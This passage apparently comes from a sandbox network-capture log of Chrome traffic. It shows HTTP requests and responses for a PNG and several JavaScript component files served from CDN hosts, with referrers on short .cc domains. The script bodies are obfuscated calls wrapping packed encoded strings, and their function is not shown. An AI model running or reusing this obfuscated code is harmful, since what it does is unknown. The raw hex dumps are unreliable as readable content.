                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 35006
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 22 Feb 2022 09:18:48 GMT
                                                                                                                                                          ETag: "6214aa78-88be"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE3[298],EU-GER-frankfurt-GLOBAL1-CACHE3[0,TCP_HIT,296],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b689acc72f5cc4b57bee8ef38de3a0da
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 7105854
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15756INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15
                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 9a 0d 5d e1 04 c9 e7 10 5c a4 a0 9a 7c 21 a4 a6 d8 48 39 39 b0 a7 a9 97 40 c2 66 2f aa 7d f1 1d 92 ec 2a 01 26 21 91 8a 22 0e b5 65 d3 76 54 8c 2d 83 d1 68 38 16 cb a2 50 db b0 89 e9 cb ce 1b 6d 45 f3 b6 ad c8 12 fc 4a ba 2e 94 74 73 41 39 8f c4 70 f9 c4 0a 36 86 4e bc ca be af 34 6d 3f 28 c5 52 97 36 e1 9c cb a9 2b e8 c9 39 0a ac 60 5f 39 58 36 9f 46 e5 dc 01 e5 c0 55 07 f9 fe 27 80 7d 27 5b 77 c2 8f d6 8b 4e 47 e2 a9 d7 b0 e8 d4 eb 49 da 16 a1 65 65 35 9d 55 82 ab 22 17 e6 de 04 16 df f9 06 11 c4 46 9c 3a ff 1c 64 fc 70 36 7c 09 1e c6 a4 88 11 67 9c 84 ec 73 27 e3 5d 52 44 6b da 83 48 ea cd 88 a9 06 58 c8 3a 44 c9 7d e4 a6 a7 c2 c2 99 f1 c4 f3 9f e2 4b 72 31 46 b2 06 7a 6a 20 8b c8 43 24 42 bb 69 e5 26 3c f8 d0 3b 78 65 51 15 cc c4 79 4a 72 52 59 7e b7
                                                                                                                                                          Data Ascii: ]\|!H99@f/}*&!"evT-h8PmEJ.tsA9p6N4m?(R6+9`_9X6FU'}'[wNGIee5U"F:dp6|gs']RDkHX:D}Kr1Fzj C$Bi&<;xeQyJrRY~
                                                                                                                                                          2024-06-09 22:41:25 UTC2866INData Raw: 25 f6 6b 5f 3e b4 50 52 99 2f be ee 85 bd 6b 5e b9 a9 fc 8c 02 a8 aa f6 2c 4e 54 8c bd e2 8b aa f5 6f 4a 97 3f 75 40 a1 d3 5a 87 eb 02 9e a5 0c 43 0c bf f9 e1 d2 fa b0 c7 f7 f6 e3 37 c4 ee 9f bf c2 40 18 33 e7 fe 19 83 f7 71 d9 13 7a ab 42 32 0f ae 14 eb ad 23 db d1 d9 16 25 21 58 6a 30 59 96 32 ed 32 65 c6 58 e1 95 97 17 4e 09 46 a2 b3 55 02 86 48 52 22 83 70 4a 12 81 55 b5 94 48 28 48 d8 04 89 05 03 1f c1 e2 dc 57 9f 48 44 58 e4 13 91 e5 90 4c 0c 45 62 31 a7 00 6f 5b 50 12 76 b8 82 fe c5 85 f9 e2 0a 29 d4 5f ea 5f 94 0d 93 5e 01 39 09 ae 29 c5 84 8a 29 a5 68 aa 6a 45 17 09 c8 ce d5 6b 30 eb 9a 2b 30 66 dc 24 b4 18 0d 25 62 2c d1 e9 5d b5 c2 d9 ae b4 b9 b2 87 14 0c 74 b4 bd ba 33 12 75 6f 0a a5 15 9c 77 e1 b3 8d 8d bf 1e ea 09 5e 7f fb ef 57 42 72 25 64
                                                                                                                                                          Data Ascii: %k_>PR/k^,NToJ?u@ZC7@3qzB2#%!Xj0Y22eXNFUHR"pJUH(HWHDXLEb1o[Pv)__^9))hjEk0+0f$%b,]t3uow^WBr%d


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          708192.168.2.55049054.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC554OUTGET /pc/240516-03/static/js/components/inside.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC357INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645cacb-564"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:51 GMT
                                                                                                                                                          Content-Length: 1380
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 17818932293562264798
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC1129INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 45 59 42 64 41 47 67 47 38 41 6c 41 4d 57 6f 47 45 41 75 41 4d 77 46 63 30 59 41 58 41 53 33 55 78 46 4c 51 42 4b 63 67 46 39 53 41 63 30 49 41 50 4e 4d 7a 61 63 65 61 50 67 4e 49 64 68 41 49 68 5a 49 51 41 41 69 51 63 41 54 6c 30 37 71 41 33 41 48 6b 77 41 4b 78 43 63 41 64 41 42 4d 51 54 4c 6d 68 41 41 46 41 79 67 67 67 44 48 41 4a 36 59 61 4b 54 71 41 50 71 68 49 45 67 41 73 69 67 4f 4c 41 41 32 49 4f 6f 55 41 47 35 51 38 53 77 67 44 41 43 45 41 41 77 69 67 71 5a 70 42 6a 70 63 41 4c 77 63 6d 4f 71 35 4d 42 42 4d 36 6f 4b 6b 53 47 58 6b 61 46 41 41 74 6c 6e 71 72 6b 68 63 54 73 6b 51 58 68 42 49 44 4e 6a 71 33 4a 30 47 36 6d 51
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgEYBdAGgG8AlAMWoGEAuAMwFc0YAXAS3UxFLQBKcgF9SAc0IAPNMzaceaPgNIdhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQTLmhAAFAygggDHAJ6YaKTqAPqhIEgAsigOLAA2IOoUAG5Q8SwgDACEAAwigqZpBjpcALwcmOq5MBBM6oKkSGXkaFAAtlnqrkhcTskQXhBIDNjq3J0G6mQ
                                                                                                                                                          2024-06-09 22:41:25 UTC251INData Raw: 55 5a 6d 4c 59 74 6f 6a 4a 36 57 4b 48 44 59 4b 46 57 47 51 6f 49 32 45 78 63 31 4b 52 56 44 6f 44 52 77 32 34 77 43 79 76 4b 34 31 56 49 65 58 4b 6f 31 4a 31 32 77 76 4e 64 30 48 51 39 61 30 34 78 42 5a 71 6b 42 44 7a 58 73 59 6b 54 41 63 4d 6b 61 42 2f 4e 64 38 51 6f 42 77 4a 71 30 2f 54 42 52 77 36 45 43 50 71 45 6a 6a 51 42 71 45 37 46 47 4f 49 4c 7a 30 77 49 54 4f 7a 53 7a 62 50 71 43 4c 59 74 6d 6a 44 70 43 34 4f 75 67 73 33 49 72 68 41 71 38 31 61 74 69 44 64 4d 43 55 45 73 42 58 55 41 4b 6f 7a 45 43 49 52 52 51 43 55 42 67 56 46 55 77 49 41 4b 6f 73 6e 63 66 46 6c 53 67 70 41 70 71 51 52 56 38 45 57 56 51 30 50 51 44 52 69 49 7a 38 54 2f 41 48 38 53 46 47 47 54 68 4d 45 53 38 51 47 51 59 31 78 53 41 73 66 68 49 4e 44 70 68 41 41 22 29
                                                                                                                                                          Data Ascii: UZmLYtojJ6WKHDYKFWGQoI2Exc1KRVDoDRw24wCyvK41VIeXKo1J12wvNd0HQ9a04xBZqkBDzXsYkTAcMkaB/Nd8QoBwJq0/TBRw6ECPqEjjQBqE7FGOILz0wITOzSzbPqCLYtmjDpC4Ougs3IrhAq81atiDdMCUEsBXUAKozECIRRQCUBgVFUwIAKosncfFlSgpApqQRV8EWVQ0PQDRiIz8T/AH8SFGGThMES8QGQY1xSAsfhINDphAA")


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          709192.168.2.55049154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC561OUTGET /pc/240516-03/static/js/components/121/footerNav.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC357INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645ca5b-1064"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:59 GMT
                                                                                                                                                          Content-Length: 4196
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 5458009441991006963
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC1108INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 48 41 4e 67 47 59 42 64 41 47 67 47 38 41 33 41 63 77 41 73 42 35 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 6c 53 6e 55 6c 41 43 55 56 4b 41 43 63 41 42 4b 77 43 38 35 41 45 51 41 36 41 50 53 63 41 6a 50 67 41 4d 68 46 55 6c 5a 67 41 63 6c 45 70 4b 41 56 6b 67 57 4e 73 43 67 43 59 41 62 4f 43 6f 57 6b 41 4c 49 53 31 6c 6c 61 6a 77 43 5a 66 65 67 62 47 70 68 5a 57 4e 69 41 49 39 47 67 75 72 72 34 41 6e 46 36 71 6e 42 36 45 63 59 46 47 4a 75 61 57 31 67 71 45 39 67 43 61 41 49 49 78 76 72 69 4a 50 75 72 75 36 63 46 5a 59 51 6f 41 61 67 41 65 41 4b 6f 41 47 69 55 41 37 4f 58 4a 6d 67 43 73 31 5a 6d 68 4f 63 33 31 41 46 34 41 6f 69 58 34 33
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHANgGYBdAGgG8A3AcwAsB5ALgDMBXNGAFwEt1MlSnUlACUVKACcABKwC85AEQA6APScAjPgAMhFUlZgAclEpKAVkgWNsCgCYAbOCoWkALIS1llajwCZfegbGphZWNiAI9Ggurr4AnF6qnB6EcYFGJuaW1gqE9gCaAIIxvriJPuru6cFZYQoAagAeAKoAGiUA7OXJmgCs1ZmhOc31AF4AoiX43
                                                                                                                                                          2024-06-09 22:41:25 UTC3088INData Raw: 62 6a 42 41 56 33 4a 59 31 75 44 48 54 46 43 67 64 4f 4b 68 52 61 46 64 4f 57 6a 54 4a 46 36 55 71 34 45 68 58 61 56 37 32 62 66 32 72 68 2f 57 71 56 30 4e 61 4e 4e 71 56 6b 67 6a 78 2f 6e 57 68 42 4b 6a 4d 63 52 61 50 68 2b 55 32 50 63 4b 44 41 4b 6d 56 30 6a 61 6b 36 69 66 66 6a 43 69 6f 62 34 47 61 57 4d 78 48 51 4c 63 6b 63 53 2b 4a 54 6b 30 4b 42 41 6c 44 53 6e 78 6d 50 72 63 7a 6d 4f 56 72 53 31 34 71 42 32 6d 4d 48 61 6b 72 68 73 79 31 63 43 50 44 36 47 50 66 4e 6a 6a 36 56 6a 36 36 71 55 6c 68 2b 42 76 63 7a 43 47 56 76 55 34 71 63 50 6b 36 75 41 79 78 52 6e 73 34 38 72 54 32 47 52 7a 46 55 64 6a 75 42 34 2b 7a 57 69 32 4d 54 36 75 49 39 68 6d 4b 56 51 43 49 43 55 6c 6d 56 76 64 63 7a 63 54 33 56 39 74 78 55 66 59 36 73 6a 5a 4c 57 6a 4e 66 32 51
                                                                                                                                                          Data Ascii: bjBAV3JY1uDHTFCgdOKhRaFdOWjTJF6Uq4EhXaV72bf2rh/WqV0NaNNqVkgjx/nWhBKjMcRaPh+U2PcKDAKmV0jak6iffjCiob4GaWMxHQLckcS+JTk0KBAlDSnxmPrczmOVrS14qB2mMHakrhsy1cCPD6GPfNjj6Vj66qUlh+BvczCGVvU4qcPk6uAyxRns48rT2GRzFUdjuB4+zWi2MT6uI9hmKVQCICUlmVvdczcT3V9txUfY6sjZLWjNf2Q


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          710192.168.2.55049590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC560OUTGET /pc/240516-03/static/js/components/partnerList.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC637INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 744
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-2e8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE5[16],EU-GER-frankfurt-GLOBAL1-CACHE10[0,TCP_HIT,15],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1585441
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 54bbabf89c3d7d19236d42a764e6ceac
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1006559
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC744INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 54 67 42 59 42 64 41 47 67 47 38 41 69 41 49 54 67 47 6f 41 58 53 67 4c 67 44 4d 42 58 4e 47 42 67 53 33 55 77 61 6b 30 70 45 41 45 6f 71 37 4a 43 41 41 45 53 42 67 43 63 65 33 53 67 47 34 41 38 6d 41 42 57 49 62 67 44 6f 41 4a 69 46 59 38 30 49 41 41 72 79 55 45 45 50 49 59 42 50 54 4d 4d 6f 42 39 5a 79 43 51 42 5a 46 50 76 59 41 62 45 4a 51 55 41 47 35 51 76 75 77 67 7a 41 43 45 41 41 77 41 76 71 49 71 49 66 4c 53 38 67 43 38 49 4a 69 55 30 54 41 51 72 4a 53 69 70 44 79 70 35 50 70 51 44 46 42 73 6e 4e 78 38 61 4a 6a 69 38 69 41 4d 37 50 4a 6f 35 44 44 36 61 47 5a 6c 41 42 62 4d 38 67 5a 47 55 48 34 4d 75 67 44 43 36 48 4a 51 61 43 50
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATATgBYBdAGgG8AiAITgGoAXSgLgDMBXNGBgS3Uwak0pEAEoq7JCAAESBgCce3SgG4A8mABWIbgDoAJiFY80IAAryUEEPIYBPTMMoB9ZyCQBZFPvYAbEJQUAG5QvuwgzACEAAwAvqIqIfLS8gC8IJiU0TAQrJSipDyp5PpQDFBsnNx8aJji8iAM7PJo5DD6aGZlABbM8gZGUH4MugDC6HJQaCP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          711192.168.2.55049254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC567OUTGET /pc/240516-03/static/js/components/121/footerCopyRight.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC355INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          ETag: "6645ca5b-334"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:59 GMT
                                                                                                                                                          Content-Length: 820
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 6329745468662957516
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC820INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 43 41 5a 67 46 30 41 61 41 62 77 43 49 42 36 4d 4b 67 45 51 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 54 6b 6d 67 43 55 5a 41 4c 34 6b 41 30 67 44 59 41 35 67 43 38 57 37 4c 72 7a 54 39 42 4a 45 43 49 71 73 6b 49 41 41 52 4a 4f 41 4a 32 35 63 4b 41 62 67 44 79 59 41 46 59 67 75 41 4f 67 41 6d 49 5a 74 7a 51 67 41 43 6b 5a 51 51 51 52 7a 67 42 50 54 44 51 53 43 67 42 39 63 4a 41 6b 41 46 6b 55 4a 31 59 41 47 78 41 4b 63 67 41 33 4b 45 54 57 45 45 59 41 51 67 41 47 55 53 46 7a 44 4b 4d 39 46 41 42 65 45 45 77 4b 66 4a 67 49 5a 67 6f 68 45 68 67 4b 73 69 63 6f 54 69 68 46 44 68 34 2b 45 53 4d 51 54 6c 59 6a 4e 44 49 59 58 30 43 41 4a 57
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjCAZgF0AaAbwCIB6MKgEQoC4AzAVzRgBcBLdTTkmgCUZAL4kA0gDYA5gC8W7LrzT9BJECIqskIAARJOAJ25cKAbgDyYAFYguAOgAmIZtzQgACkZQQQRzgBPTDQSCgB9cJAkAFkUJ1YAGxAKcgA3KETWEEYAQgAGUSFzDKM9FABeEEwKfJgIZgohEhgKsicoTihFDh4+ESMQTlYjNDIYX0CAJW


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          712192.168.2.55049823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC553OUTGET /pc/240516-03/static/js/components/iconSvg.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC625INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 760
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:50 GMT
                                                                                                                                                          ETag: "6645caca-2f8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE6[3],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2577441
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 4715f71bea08f592ff70812e9e345e9d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 14559
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC760INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 64 67 47 59 42 64 41 47 67 47 38 41 69 41 52 67 44 63 41 4e 41 4e 6b 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 68 36 6b 51 70 4a 41 45 6f 71 48 4a 43 41 41 45 53 48 67 43 63 2b 76 53 67 47 34 41 38 6d 41 42 57 49 58 67 44 6f 41 4a 69 44 5a 38 30 49 41 41 71 4b 55 45 45 49 70 34 42 50 54 4b 4d 6f 42 39 56 79 43 51 42 5a 46 49 59 34 41 62 45 45 6f 4b 57 69 68 2f 44 68 41 57 41 45 49 41 42 67 42 66 63 54 55 41 5a 53 55 7a 41 48 4e 53 41 43 45 55 46 45 43 6f 4e 44 56 51 78 56 6b 30 41 46 35 79 4e 43 67 41 57 30 6a 4b 46 58 51 41 57 69 52 61 4e 4f 43 49 61 77 67 6b 46 6e 4a 36 74 41 42 68 66 79 67 6b 4c 76 4a 48 57 78 59 55 35 54 51 4d
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQM


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          713192.168.2.55049790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC556OUTGET /pc/240516-03/static/js/components/iconSvg.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
